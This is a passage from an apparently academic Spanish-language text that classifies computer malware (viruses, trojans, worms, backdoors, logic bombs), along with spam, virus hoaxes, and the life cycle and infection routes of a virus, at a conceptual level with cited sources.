(Tunnelling). Un virus "Tunnelling" es el que busca los controladores originales de las interrupciones de DOS y BIOS y los llama directamente, saltándose cualquier programa de supervisión activo que pueda estar cargado y haya interceptado los respectivos vectores de interrupción en un intento de detectar actividad viral. Algunos antivirus también usan técnicas de "Tunnelling" intentando sortear cualquier virus no detectado ó desconocido que pueda estar activo Cuando se ejecutan (Google, 2005)29.

5.4 CLASIFICACIÓN DE LOS VIRUS

39

Los virus en la actualidad presentan distintos tipos de infección y formas de ataque para lo cual existen algunas clasificaciones para estos tipos de código, debido a que estos no se propagan todos de igual manera ni por los mismos medios, y no siempre efectúan los mismos ataques a los usuarios; algunos existen para recopilar información como passwords del usuario quien a sido infectado y luego retransmitir esta información a personas ajenas, otros simplemente atacan los datos que se encuentran almacenados y otros tienen como objetivo ralentizar el flujo de la información donde el Internet por ejemplo ya ha sido victima. 5.4.1 Virus. Un verdadero virus tiene como características más importantes la capacidad de copiarse a sí mismo en soportes diferentes al que se encontraba originalmente, y por supuesto hacerlo con el mayor sigilo posible y de forma transparente al usuario; a este proceso de auto réplica se le conoce como "infección", de ahí que en todo este tema se utilice la terminología propia de la medicina: "vacuna", "tiempo de incubación", etc. Un virus puro también debe modificar el código original del programa o soporte objeto de la infección, para poder activarse durante la ejecución de dicho código; al mismo tiempo, una vez activado, el virus suele quedar residente en memoria para poder infectar así de forma transparente al usuario (El Hacker, 2005)20. 5.4.2 Troyano. Timeo Danaos et dona ferentes - Temo a los griegos incluso cuando hacen un regalo. (Virgilio, la Eneida, II, 49). En la historia Troya era una ciudad inquebrantable para los griegos quienes intentaban tomarla, estos al ver la dureza de los troyanos simularon su retirada y fin del asedio, dejando, como presente y muestra de respeto, un enorme caballo de madera. Los troyanos aceptaron este enorme caballo y lo introdujeron en su ciudad. Pero en realidad el caballo era una estrategia utilizada por los griegos para tomar la ciudad, ya que contenía en su interior a soldados enemigos, que cuando tuvieron la oportunidad, salieron y permitieron el paso de sus tropas abriendo las puertas de la ciudad así de esta manera tan ingeniosa finalmente tomaron Troya. Aplicado al mundo de la informática, los troyanos eran conocidos como una modalidad de virus informático, hasta que con el auge de Internet, y utilizando su arquitectura básica de cliente-servidor, tomaron su propio rumbo, haciéndose, hoy en día, una distinción muy clara entre lo que es un virus y lo que es un troyano. Un Troyano (Trojan) o Caballo de Troya es un programa basado en una arquitectura cliente-servidor. Por lo cual es utilizado como una efectiva herramienta de administración remota. Son aplicaciones ocultas en otro tipo de archivos también ejecutables que al ser ejecutadas en un ordenador por el usuario de una red que utiliza los protocolos TCP/IP (ya sea LAN o Internet) permite que el atacante pueda tomar control del equipo remoto sin autorización, desde otro PC. Por lo general un Troyano se instala en segundo plano de manera que cuando la victima ejecuta el primer programa este se instala sin levantar sospechas. Es de

40

aquí de donde viene la comparación con la leyenda del caballo de Troya (El Hacker, 2005)19. Arquitectura de un Troyano. La arquitectura de un troyano tiene principalmente dos componentes. Programa Servidor y Programa Cliente, algunos tienen componentes extras, principalmente los más recientes que incluyen algunos addins para habilitar un mayor número de funciones o un programa editor para dar una configuración mas personalizada al servidor y así tener un mayor control sobre las victimas, como es el caso del Subseven. Programa Servidor. El Servidor que ha sido previamente instalado en la PC de la victima, es un programa que ocupa muy poco espacio (desde 3 Kb hasta poco mas de 1 Mb), mientras menos espacio ocupe es mejor ya que este va anexado a otro ejecutable intentando pasar desapercibido. El servidor va asociado al Cliente, así el servidor crea un backdoor (puerta trasera) para permitir la intrusión del atacante por cualquiera de los 65536 puertos TCP/IP. Programa Cliente. El cliente que se encuentra desde el ordenador del intruso generalmente tiene una interfaz con opciones desde las cuales puede ejecutar remotamente acciones determinadas sobre la PC de la victima. Programa Editor. Es opcional y viene incluido en algunos troyanos exclusivamente, este configura y personaliza el modulo servidor dándole opciones de métodos para avisar cuando la victima se ha conectado e identificarla fácilmente en caso de tener varias victimas por medio de su dirección IP. Como funcionan. Un Troyano consta de dos módulos Cliente y Servidor, son indispensables ambos para su funcionamiento. Este crea una puerta trasera el cual proporciona la posibilidad de un acceso no autorizado al ordenador de la víctima, de tal forma que abre un canal de comunicación por donde se puede acceder a su sistema. El módulo servidor puede estar protegido con una contraseña la cual debe ser introducida por el cliente para tener el control, de esta manera el atacante evita que otra persona intente desde otro modulo cliente tome el control. El cliente necesita la dirección IP de la maquina donde esta instalado el modulo servidor para poder entablar una conexión. El cual puede ser enviado por el servidor a una lista de correo, un canal de IRC, al ICQ, algún correo electrónico, un mensaje instantáneo, etc. El equipo servidor mantiene abiertos uno o mas puertos específicos a la espera de tener comunicación con el programa cliente y así empezar a recibir instrucciones para empezar a ejecutarlas. Los Caballos de Troya no se reproducen solos por lo que no son considerados un virus como tal, no realizan acciones destructivas por si solos, lo que dificulta su detección, pueden llegar a permanecer activos durante mucho tiempo, de hecho

41

muchas personas conviven con más de algún Troyano en el PC y nunca llegan a percatarse de ello. Un Troyano necesita la intervención del usuario cliente para poder realizar cualquier acción. Salvo escasas ocasiones en que existe un gran numero de variantes del mismo troyano debido a que el código fue publicado por el autor, las empresas antivirus no los catalogan en la categoría de virus ni alcanzan los altos niveles de peligrosidad (El Hacker, 2005)19. 5.4.3 Gusano. Y Paul se encontró con el gusano, exultante, como un Emperador dominando el universo. (F. Herbert "Dune") Un gusano, al igual que un virus, está diseñado para copiarse de un equipo a otro, pero lo hace de forma automática tomando el control de las características del equipo que pueden transportar archivos o información. Una vez que el virus está en el sistema, puede desplazarse sólo. El mayor peligro de los gusanos es su capacidad para replicarse en grandes cantidades. Por ejemplo, un gusano puede enviar copias de sí mismo a todas las personas que se encuentran en la libreta de direcciones de correo electrónico y los equipos de esas personas harán lo mismo, produciendo un efecto dominó de obstrucción del tráfico de red que ralentizaría las redes de las empresa e Internet en general. Cuando aparecen nuevos gusanos, se extienden rápidamente, atascando las redes y, posiblemente, haciendo que los usuarios tengan que esperar hasta el doble de tiempo para ver páginas Web en Internet. Esta amenaza generalmente se propaga sin que el usuario realice ninguna acción y distribuye copias completas (posiblemente modificadas) de sí mismo por las redes. Un gusano puede consumir memoria o ancho de banda de la red, haciendo así que un equipo deje de responder. Debido a que los gusanos no necesitan desplazarse mediante un archivo o programa "anfitrión", también pueden crear agujeros en el sistema que permiten que alguien penetre y tome el control del equipo de forma remota. Un ejemplo es el reciente gusano MyDoom el cual estaba diseñado para abrir una "puerta trasera" en sistemas infectados y utilizar esos sistemas para atacar sitios Web. Los Gusanos son programas que tienen como única misión la de colapsar cualquier sistema, ya que son programas que se copian en archivos distintos en cadena hasta crear miles de replicas de si mismo. Así un” gusano” de 866 Kb, puede convertirse en una cadena de ficheros de miles de Megas, que a su vez puede destruir información, ya que sustituye estados lógicos por otros no idénticos (Microsoft, 2005)42. Estos programas suelen habitar en la red a veces como respuesta de grupos de Hackers que pretenden obtener algo. La existencia de uno de estos gusanos se hace notar, cuando la red se ralentiza considerablemente, ya que normalmente el

42

proceso de auto replicado llena normalmente el ancho de banda de trabajo de un servidor en particular (Hernández, 2005)31. Este código sigue el mismo principio que los virus. Son programas que intentan replicarse a sí mismos para conseguir una propagación máxima. Aunque no es su principal característica, también pueden contener una bomba lógica con un detonador retardado. La diferencia entre los gusanos y los virus la da el hecho de que los gusanos no utilizan programas host como medio de transporte, sino que se benefician de las capacidades que proveen las redes, como el correo electrónico, para propagarse de máquina en máquina (Blaess, 2005)8. El nivel técnico de los gusanos es bastante alto; usan las vulnerabilidades de software que ofrecen los servicios de red para forzar su auto-duplicación en una máquina remota. El arquetipo es el "Internet Worm" de 1988, El Internet Worm es un ejemplo de gusano puro, sin contener una bomba lógica, sin embargo su involuntario efecto devastador fue terrible. Los gusanos son relativamente raros debido a su complejidad. No se deben mezclar con otro tipo de peligros, como los virus transmitidos como adjuntos a un correo electrónico como el famoso “I LoveYou”. Los virus son mucho más simples ya que son macros escritas (en Basic) para aplicaciones de ofimática que se lanzan automáticamente cuando se lee el correo. Esto sólo funciona en algunos sistemas operativos, cuando el lector de correo está configurado de forma demasiado simple. Estos programas se parecen más a los troyanos que a los gusanos, ya que requieren una acción del usuario para ejecutarse (Blaess, 2005)8. Cómo se propagan los gusanos y otros tipos de virus. Prácticamente todos los virus y la mayoría de los gusanos no pueden propagarse a menos que se ejecute un programa infectado. Muchos de los virus más peligrosos se propagaron inicialmente mediante los datos adjuntos de los correos electrónicos (los archivos que se envían con un mensaje de correo electrónico). Normalmente se puede saber si el correo electrónico contiene datos adjuntos porque aparece el icono de un sujetapapeles que representa los datos adjuntos con su nombre. Fotografías, cartas escritas en un editor de texto e incluso hojas de cálculo, son sólo algunos de los tipos de archivos que se reciben a través del correo electrónico cada día. El virus se inicia al abrir los datos adjuntos del archivo (normalmente al hacer doble clic en el icono de datos adjuntos). Cómo saber si se tiene un gusano u otro tipo de virus. Al abrir y ejecutarse un programa infectado, existe la posibilidad de no saber que este contiene un virus. Puede suceder que el equipo se ralentice, deje de responder o se bloquee y se reinicie cada pocos minutos. A veces, un virus ataca los archivos necesarios para iniciar el equipo. En ese caso, puede suceder que al momento de presionar el botón de encendido llegue aparecer una pantalla en blanco. Todos estos síntomas son signos comunes de que el equipo tiene un virus, aunque también pueden ser provocados por problemas con el hardware o el software que no tiene nada que

43

ver con un virus. Se debe tener cuidado con los mensajes que advierten que se ha enviado un mensaje que es portador de un virus. Esto puede significar que el virus ha colocado la dirección del correo electrónico como remitente de un correo infectado. No significa necesariamente que este tenga un virus. Algunos virus tienen la capacidad de falsificar direcciones de correo electrónico. A esto se le conoce como imitación. A menos que se cuente con un software antivirus instalado en el, no hay ninguna manera eficaz de saber si hay un virus o no, si no hay un software antivirus actualizado (Microsoft, 2005)42. 5.4.4 Puertas traseras. “Cualquier medio capaz de ampliar el alcance del hombre es lo suficientemente poderoso como para derrocar su mundo. Conseguir que la magia de ese medio trabaje para los fines de uno, antes que en contra de ellos, es alcanzar el conocimiento.” Alan Kay. Los Backdoors o puertas traseras no son considerados propiamente como virus, pero representan un riesgo de seguridad importante, y usualmente son desconocidas, pero son grandes los problemas que estas pueden llegar a producir, haciendo referencia a una forma "no oficial" de acceso a un sistema o a un programa. Algunos programadores dejan puertas traseras a propósito, para poder entrar rápidamente en un sistema; en otras ocasiones existen debido a fallos o errores. Las Backdoors representan una de las formas típicas de actuación de los piratas informáticos, donde tienen la posibilidad de introducirse en los diversos sistemas por una puerta trasera. Estos programas no se reproducen solos como los virus, sino que son enviados con el fin de tener acceso a equipos, muchas veces a través del correo electrónico, por lo que la mayoría de las veces no son fáciles de detectar y no siempre causan daños ni efectos inmediatos por su sola presencia, siendo así que pueden llegar a permanecer activos mucho tiempo sin que sean detectados. Generalmente las Backdoors se hacen pasar por otros programas, es decir, se ocultan en otro archivo que les sirve de caballo de Troya para que el usuario los instale por error. Lo peor que puede pasar cuando se está en el Messenger o en el ICQ no es contagiar el PC con un virus. Lo peor es que alguien instale una backdoor en el equipo. Las puertas traseras se basa en la arquitectura cliente / servidor, sólo se necesita instalar un programa servidor en una máquina para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente adecuado, esta puede bien ser la computadora de un usuario descuidado o poco informado. Las puertas traseras (Backdoors) son programas que permiten acceso prácticamente ilimitado a un equipo de forma remota. El problema, para quien quiere usar este ataque, es que debe convencer a la persona de que instale el servidor. Por eso, es probable que aparezcan desconocidos ofreciendo algún

44

programa maravilloso y tentador que en realidad es un Troyano el cual es portador de un servidor que proporcionará a algún intruso el acceso total a la computadora. (Moreno, 2005)45. Con todo el riesgo que esto implica, la forma más simple y totalmente segura de evitarlo es no aceptar archivos ni mucho menos ejecutar programas que hayan sido enviados de origen dudoso. Los programas que se clasifican como backdoors o "puertas traseras" son utilidades de administración remota de una red que permiten controlar los equipos conectados a ésta. El hecho que se les clasifique como software malévolo en algunos casos, es que cuando corren, se instalan en el sistema sin necesidad de la intervención del usuario y una vez instalados en el ordenador, no se pueden visualizar estas aplicaciones en la lista de tareas en la mayoría de los casos. Consecuentemente una backdoor puede supervisar casi todo proceso en las computadoras afectadas, desinstalar programas, descargar virus en la PC remota, borrar información y muchas cosas más. Lo importante es que hay ciertas medidas mínimas para evitar un ataque, la información sensible que se encuentre en cualquier equipo, con el simple hecho de que tenga acceso a la Internet es suficiente para estar expuesto a ataques de diversa índole. (Moreno, 2005)45. Las puertas traseras backdoors se pueden comparar con los Troyanos pero no son idénticas. Una puerta trasera permite a un usuario avanzado actuar en una aplicación para cambiar su comportamiento. Se puede comparar con los cheat codes usados en los juegos para obtener más recursos, alcanzar un nivel superior, etc. Pero también afectan las aplicaciones críticas como autentificación de conexiones o correo electrónico, ya que pueden tener un acceso oculto con una contraseña conocida sólo por el creador del software. Los programadores con la intención de facilitar la fase de depuración, a menudo dejan una pequeña puerta abierta para poder usar el software sin hacerlo a través del mecanismo de autentificación, incluso cuando la aplicación se ha instalado en el cliente. A veces hay mecanismos de acceso oficial que usan contraseñas por defecto (system, admin, superuser, etc) pero no está muy claro qué lleva a los administradores dejarlas activas.Como ejemplo se tiene a uno de los padres de Unix, quien describe un acceso escondido que implementó en los sistemas Unix hace varios años, Empezó cambiando la aplicación /bin/login para incluir un pequeño código, que permitía el acceso directo al sistema escribiendo una contraseña incluida de forma precompilada (no tomada de /etc/passwd). De esta forma, Thompson podía visitar todos los sistemas usando su versión de login (Blaess, 2005)8. Sin embargo, entonces los códigos fuente de las aplicaciones estaban disponibles (como hoy en el software libre). Luego el código fuente login.c estaba presente en los sistemas Unix y cualquiera podría haber leído el código incluido. De esta manera, Thompson puso un login.c limpio sin la puerta de acceso. El problema

45

era que cualquier administrador podía recompilar login.c eliminando así la versión falsa. Entonces, Thompson modificó el compilador estándar de C para hacerle capaz de incluir la puerta trasera cuando notara que alguien intentaba compilar login.c. Pero, de nuevo, el código fuente del compilador cc.c estaba disponible y cualquier persona podría leer y recompilar el compilador. Así pues, Thompson puso un código fuente limpio del compilador, pero el fichero binario, ya procesado, era capaz de identificar sus propios ficheros fuente, incluyendo el código usado para infectar login.c. La única forma de resolver un problema así sería recomenzar con un sistema completamente virgen. A menos que se construya una máquina a partir de cero creando todo el microcódigo, el sistema operativo, los compiladores, las utilidades, no se podría estar seguro de que todas las aplicaciones estén limpias, incluso si está disponible el código fuente (Blaess, 2005)8. 5.4.5 Bomba lógica o Bomba de Tiempo. Las Bombas lógicas o Bombas de Tiempo, son programas maliciosos, los cuales se activan después de transcurrido un tiempo días o horas o inclusive se activan en una fecha en particular, o simplemente en el momento en que el usuario hace uso de algunas teclas o comandos establecidos por el creador dicho programa. Una bomba lógica es una puede llegar a tener efectos muy variados como por ejemplo: Consumo excesivo de los recursos del sistema (memoria, disco duro, CPU, etc.). Rápida destrucción del mayor número de ficheros posible (sobrescribiéndolos para evitar que se pueda recuperar su contenido). Destrucción disimulada de un fichero de vez en cuando, para permanecer invisible el mayor tiempo posible. Ataque a la seguridad del sistema (implementación de derechos de acceso muy permisivos, envío del fichero de contraseñas a una dirección de Internet, etc.). Uso de la máquina para terrorismo informático, como un DDoS (Distributed Denial of Service, Denegación de Servicio) inventario de números de licencia de las aplicaciones en el disco y envío de los mismos a un programador.

-

En algunos casos la bomba lógica puede estar escrita para un sistema objetivo específico en el que se intentaría robar información confidencial, destruir ciertos ficheros o desacreditar a un usuario tomando su identidad. La misma bomba ejecutada en cualquier otro sistema será inofensiva (Blaess, 2005)8.

46

La bomba lógica o de tiempo también puede intentar destruir físicamente el sistema en el que reside. Las posibilidades son muy pequeñas pero existen (borrado de memorias CMOS, cambio en la memoria flash de modems, movimientos destructivos de cabezales de impresoras, plotters, escáneres, movimiento acelerado de las cabezas lectoras de los discos duros, etc.) Estos programas requieren de un detonador para ser activados. En efecto, la generación de acciones devastadoras de Troyanos o virus en una primera ejecución es una mala táctica desde el punto de vista de la eficiencia. Tras instalarse la bomba lógica, es mejor para ella esperar antes de explosionar. Esto incrementará las oportunidades de extenderse a otros sistemas en el caso de transmisión por virus; y en el caso de un Troyano evitará que el usuario relacione fácilmente la instalación de la nueva aplicación con el comportamiento anormal de su máquina. Como en cualquier acción maligna, el mecanismo de lanzamiento puede variar: diez días después de la instalación, borrado de una cuenta de usuario dada (licencia), teclado y ratón inactivos durante 30 minutos, gran actividad en la cola de impresión, etc. Cuando la Bomba lógica viene adherida a un Troyano por ejemplo uno que funciona por medio de un protector de pantalla, este puede activarse después de una hora, tiempo en el cual a estado funcionando el protector de pantalla donde es muy probable que el usuario no este sentado frente al equipo y la Bomba se active sin que este se percate del daño (Blaess, 2005)8. Al igual que un virus las bombas lógicas están especialmente diseñadas para hacer daño. Existen dos definiciones del mismo acrónimo o programa asociado. Una es la de crear un subprograma que se active después de un tiempo llenando la memoria del ordenador y otra es la de colapsar el correo electrónico. De cualquier forma ambos son dañinos, pero actúan de forma diferente. En la primera referencia, este se instala en el ordenador después de ser bajado junto a un mensaje de e-mail. Se incuba sin crear ninguna copia de sí mismo a la espera de reunir las condiciones oportunas, tras ese periodo de espera el programa se activa y sé auto replica como un virus hasta dañar el sistema. En el segundo caso, alguien envía una bomba lógica por e-mail que no es sino que un mismo mensaje enviado miles de veces hasta colapsar nuestra maquina.

Los programas antivirus no están preparados para detectar estos tipos de bombas lógicas, pero existen programas que pueden filtrar la información repetida. De modo que la única opción que tienen para hacer daño es introducir una bomba

47

lógica que se active frente a determinadas circunstancias externas (Hernández, 2005)31. 5.4.6 Spam. El significado designa a un alimento enlatado consistente en carne de cerdo picada con especias (Spiced Ham). Fue el primer producto de carne enlatada que no requería refrigeración. La aplicación a la informática toma su nombre de un sketch llamado Flying Circus (1969 - 1974) del grupo cómico inglés Monty Python en el que la camarera de un restaurante describe a una pareja los platos del menú en el cual todos los platos contenían spam (Pacheco, 2005)54. No se trata de un código dañino, pero si bastante molesto, se trata de un simple programa que ejecuta una orden repetidas veces. Normalmente en correo electrónico. Así un mensaje puede ser enviado varias cientos de veces a una misma dirección. En cualquier caso existen programas, antispam, ya que los spam son empleados normalmente por empresas de publicidad directa (Hernández, 2005)31. Se considera que un mensaje es spam sí y sólo sí el mensaje es no solicitado y, a su vez, es masivo. No solicitado significa que el receptor no dio un permiso verificable al remitente para que este le envíe el mensaje. Masivo significa que el mensaje es enviado como parte de una colección mayor de mensajes, donde todos tienen el contenido sustancialmente idéntico. La palabra "Spam" aplicada al e-mail significa Correo Electrónico Masivo No Solicitado (Unsolicited Bulk Email - "UBE"). Un mensaje electrónico es spam si: La identidad personal del receptor y el contexto son irrelevantes porque el mensaje es igualmente aplicable a muchos otros receptores potenciales. No se puede verificar que el receptor haya dado un permiso deliberado, explícito, y revocable, para que el mismo le sea enviado (Pacheco, 2005)54. Se denomina correo basura también conocido como junk-mail o spam a una cierta forma de inundar la Internet con muchas copias (incluso millones) del mismo mensaje, en un intento por alcanzar a gente que de otra forma nunca accedería a recibirlo y menos a leerlo. La mayor parte del correo basura está constituido por anuncios comerciales, normalmente de productos dudosos, métodos para hacerse rico o servicios en la frontera de la legalidad. No dejan de generar molestias a los usuarios de Internet cuando encuentran sus buzones rebosando con correos que anuncian productos o mensajes sin importancia (Álvarez, 2005)6. Las listas de correo basura con las direcciones de correo electrónico de los clientes potenciales (o víctimas seguras) se crean frecuentemente robando direcciones en las listas de distribución o comprándolas en las bases de datos de

48

los servicios en línea de Internet o bien buscando direcciones por la red. Irónicamente, los propios spammers usan el spam para anunciarse (Álvarez, 2005)6. - El origen de las direcciones de los correos spam generalmente provienen de: Internet: foros, páginas de tarjetas virtuales, newsgroups, mailing lists, suscripciones, confirmación de datos para downloads. Listas comerciales: existen personas que venden listas de correo electrónico a los spammers, y las obtienen en encuestas, y bases de datos comerciales de distintas empresas. Adivinando: más conocido como el "método del diccionario" también es muy efectivo para obtener direcciones de correo electrónico. Se lo aplica en grandes dominios. Mail Servers mal configurados: los llamados “open relay servers” y proxies abiertos permiten actuar de escalón hacia la anonimidad de los spammers. El disfraz de ISP: se compra ancho de banda a las compañias de telecomunicaciones y se actúa como ISP, cambiando de rango con frecuencia. Cuentas “one time”: son las que se utilizan para enviar spam hasta que son dadas de baja. Conexiones inalámbricas: un método que aprovecha las vulnerabilidades de las redes wireless mal configuradas, desprotegidas, no segmentadas, y de acceso no restringido (Pacheco, 2005)54. La mayor parte del spam que se recibe consiste en: Cadenas de mensajes Esquemas de "gane plata rápidamente" Avisos de servicios y/o sitios pornográficos Avisos de servicios de envío de spam Avisos de software y bases de datos para hacer spam Ofertas de hosting Avisos de acciones de empresas nuevas Productos milagrosos de dudoso efecto y origen Software ilegal, películas y/o música pirateada Existen algunas técnicas de filtrado: Todas las soluciones anti-spam implican genéricamente algunos pasos:

49

Analizar el e-mail y "etiquetarlo", según varios criterios: origen, tamaño, tema, contenido, etc. Según la "etiqueta" de cada mensaje, aplicarle acciones predefinidas: "bajarlo" o no, colorearlo, moverlo, borrarlo, poner el remitente en una lista de direcciones, etc. Algunas de estas soluciones operan antes de que la bajada del mail (típicamente dependen del ISP), Otras requieren software que operan sobre el email cuando ya lo tiene en la computadora. Una solución anti-spam podrían ser los Filtros bayesianos, La Lógica bayesiana, creada por el matemático inglés Thomas Bayes en 1763, se basa en las estadísticas y las probabilidades para predecir el futuro. Por ejemplo, la palabra "sexy" es muy probable que aparezca en un correo basura. A partir de aquí, es fácil escribir un algoritmo que filtre los mensajes que contengan palabras 'peligrosas' y este aprenda con el tiempo. Cuando llega un nuevo mensaje, el programa compara su contenido con la lista de palabras prohibidas, analiza el contexto y calcula las probabilidades de que sea basura: "Se tienen en consideración tanto lo bueno como lo malo: palabras que no suelen aparecer en los spams, como "esta noche" o "aparentemente", reducen mucho la probabilidad, mientras otras como "unsubscribe" o "Viagra" la incrementan. La ventaja, ante la mayoría de filtros que sólo tienen en consideración de dónde viene el mensaje (listas negras) o los más nuevos, que se fijan también en el contenido, es que los filtros bayesianos evolucionan con el spam. Si cambian las palabras, los filtros se dan cuenta automáticamente (Pacheco, 2005)54. 5.4.7 Hoax. En la actualidad hay miles de que virus descubiertos cada año, pero hay algunos que solamente existen en la imaginación del público y la prensa. Esta serie de virus no existen, a pesar del rumor de su creación y distribución, por esto se debe ignorar cualquier mensaje con respecto a estos supuestos "virus" y no pasar ningún mensaje sobre ellos. El reenviar mensajes sobre estos "virus-engaño" solamente sirve para fomentar su propagación. Un ejemplo de Hoax es el siguiente mensaje de advertencia: "Le envío este correo para informarle de que si ha recibido un fichero llamado “Cartablanca”, de cualquiera de sus amigos. Bórrelo inmediatamente después de leer esto así como el fichero que contiene el virus, el cual se activara el 26 de Noviembre y borrara todos los datos del hardware del PC. ......(envía este correo a otras personas) (google, 2005)29. Una de las características mas destacadas que se puede observar es lo que bien pudiera llamarse "el fenómeno Internet" son los lazos que se generan entre los integrantes de la red global. El crecimiento que se produce día a día en los foros

50

temáticos, de la mano de este fenómeno, se observa otro, el cual es la solidaridad que se establece entre los participantes, que a su vez se acompaña de un producto marginal. El Hoax se aprovecha de la unión que existe entre las comunidades de Internet y por esto en lo buzones de correo electrónico, aparecen los mensajes que previenen sobre destructivos virus que podrían llegar a los equipos de los usuarios incorporados en otros mensajes y que piden se haga propaganda de la alerta difundiéndolo a toda dirección de correo que se halle en la lista de direcciones. Los mensajes de engaño, son redactados con un lenguaje apropiado que le otorga credibilidad por parte de quien lo recibe, son falsos y en realidad son la "propia enfermedad" sobre la cual aparentemente previenen, aprovechando el temor que tiene la gente a los virus informáticos y a su solidaridad para prevenir que personas conocidas sean infectadas. La mejor "vacuna" contra estos mensajes es no prestar atención al contenido alarmista que estos llevan. Existen varios métodos para identificar los virus Hoax, pero primero se debe tener en consideración que hace que un "virus" de estas características tenga éxito en Internet. Hay dos factores conocidos que son: (A) lenguaje que impresiona "técnico", y (B) credibilidad por asociación. Si la advertencia utiliza el lenguaje técnico apropiado, la mayoría de las personas, incluyendo quienes estén informados sobre cuestiones tecnológicas, se inclinan a creer que la advertencia es real. Por ejemplo, el Hoax "Good Times" dice que "...si el programa no se detiene, el procesador de la computadora será colocado en un bucle binario infinito de enésima complejidad, que puede dañar gravemente el procesador...". La primera vez que el usuario lee esto, le impresiona como si pudiera haber algo de verdad en él. Si se investiga un poco, se descubre que no existe tal cosa como un bucle binario infinito de enésima complejidad y que los procesadores están diseñados para ejecutar bucles durante semanas a la vez sin dañarse. Cuando se menciona "credibilidad por asociación", se hace referencia a quien es el supuesto remitente que envía la advertencia. Si es un usuario perteneciente a una organización tecnológica importante el envía la advertencia a alguien fuera de la organización, la gente del exterior tiende a creer en la advertencia porque la empresa debería tener conocimiento de tales asuntos (Morlans, 2005)48. Aunque el usuario que envía el mensaje no tenga idea de lo que esta hablando, el prestigio de la empresa lo respalda, dándole una apariencia real. Si un gerente de la empresa envía la advertencia, el mensaje esta doblemente respaldado por las reputaciones de la compañía y del gerente. Los destinatarios de estos mensajes deberían estar especialmente atentos si la advertencia los incita a reenviar el mensaje a las listas de correo. Esto debería ser como una alerta roja indicando que el mensaje puede ser un Hoax. Otra señal de

51

alerta a la que se debe prestar atención es cuando el mensaje indica que es una advertencia del FCC (Federal Communication Commission - Comisión Federal de Comunicaciones). Según el FCC, no han difundido, y nunca difundirán mensajes de advertencia sobre virus, ya que no es parte de su trabajo. Ningún virus puede venir en el texto de un mensaje. Si, en cambio, puede hacerlo en un archivo adjunto que se recibe junto a un mensaje y que en este caso, la mejor protección es desconfiar y no ejecutar el archivo adjunto que se recibe de fuentes desconocidas y aun conocidas cuando previamente no se tiene conocimiento del envío (Morlans, 2005)48. 5.5 OTRAS AMENAZAS Dejando a un lado los temibles Virus y los caballos de Troya entre otros, existen otras amenazas en la red prediseñados para monitorear el paso de datos en línea donde se toman prestados algunos passwords y números de tarjetas de crédito. Estos programas capaces de monitorear a alguien en particular o todo aquello que se mueve en la red, reciben el nombre de Sniffers y como su nombre lo indica, son programas capaces de interpretar todos los datos de la red, copiarlos y modificarlos. Otras amenazas son los buscadores de puertos libres IRQ, con estos programas se pueden localizar puertos libres o abiertos y entrar por ellos a otros sistemas. A veces estos puertos contienen Bugs. Fallos y los hackers las emplean para penetrar en los sistemas (Hernández, 2005)31. 5.6 LA VIDA DE UN VIRUS Es claro que el virus es creado como subprograma o microprograma ejecutable, después de esto se libera en la red o se copia dentro de un programa comercial de gran difusión, para asegurar un contagio rápido y masivo. Luego de esta primera fase de creación, vienen las fases más importantes a cumplir de forma automática e independiente del control que va ha tomar el virus según su creador lo haya programado, proceso consta de contagio, incubación, replicación y ataque (Hernández, 2005)31. 5.6.1 El contagio. El contagio es quizás la fase más fácil de todo este arduo proceso. Solo hay que tener en cuenta que el virus debe introducirse o liberarse en la red. El virus debe ir incrustado en un archivo de instalación o en una simple pagina Web a través de los cookies. Las vías de infección son también principalmente los diskettes, programas copiados, Internet o el propio correo electrónico, en este ultimo caso el contagio es considerado como masivo y por lo tanto, muy peligroso, como lo fueron los virus Melissa o I Love You (Hernández, 2005)31. 5.6.2 La incubación. Normalmente los virus se crean de formas especificas que atienden a una serie de instrucciones programadas como el ocultarse y reproducirse mientras se cumplen unas determinadas opciones predeterminadas

52

por el creador del virus. Así, el virus permanece escondido reproduciéndose en espera de activarse cuando se cumplan las condiciones determinadas por el creador. Este proceso puede ser muy rápido en algunos casos y bastante largo, según el tipo de virus. 5.6.3 La replicación. La replicación consiste en la producción del propio virus, una copia de si mismo, que se situara en otro archivo distinto al que ocupa. De esta forma el virus infecta a otros archivos y otros programas, asegurándose de que el proceso de multiplicación esta asegurado. Además, el virus asegura su extensión a otros ordenadores y debe hacerlo de la forma más discreta y rápida posible. En este momento el virus no se manifiesta, ya que solo se instala en otros equipos y entre más contagio mejor. Solo de esta forma, las posibilidades que tendrá para ejercer algún daño será en un mayor número de ordenadores (Hernández, 2005)31. 5.6.4 El ataque. Cuando se cumplen las condiciones, efectuadas por el creador del virus, este entra en actividad destructora. Aquí es donde formatea el disco duro o borra archivos con extensión COM o EXE por dar algunos ejemplos. El ataque es el escalón final del trabajo del virus. Cuando se llega a este punto el trabajo ha culminado. El ordenador se encuentra infectado y si no se dispone de un programa que elimine el virus, jamás se podrá recuperar los archivos. Se pueden instalar de nuevo el software, pero de nuevo se tiene la destrucción de la unidad con el hecho de que se cumplan los acontecimientos antes citados (Hernández, 2005)31. 5.7 FORMAS DE INFECCIÓN Un virus no puede ejecutarse por si solo, necesita un programa portador para poder cargarse en memoria e infectar. Este necesita modificar la estructura, para que durante su ejecución pueda realizar una llamada al código del virus. Las partes del sistema más susceptibles de ser infectadas son el sector de arranque de los diskettes, la tabla de partición y el sector de arranque del disco duro, y los ficheros ejecutables (*.EXE y *.COM) (El Hacker, 2005)20. Para cada una de estas partes tenemos un tipo de virus, aunque muchos son capaces de infectar por sí solos estos tres componentes del sistema. En los diskettes, el sector de arranque es una zona situada al principio del disco, que contiene datos relativos a la estructura del mismo y un pequeño programa, que se ejecuta cada vez que arrancamos desde diskette.

En este caso, al arrancar con un disco contaminado, el virus se queda residente en memoria RAM, y a partir de ahí, infectara el sector de arranque de todos los

53

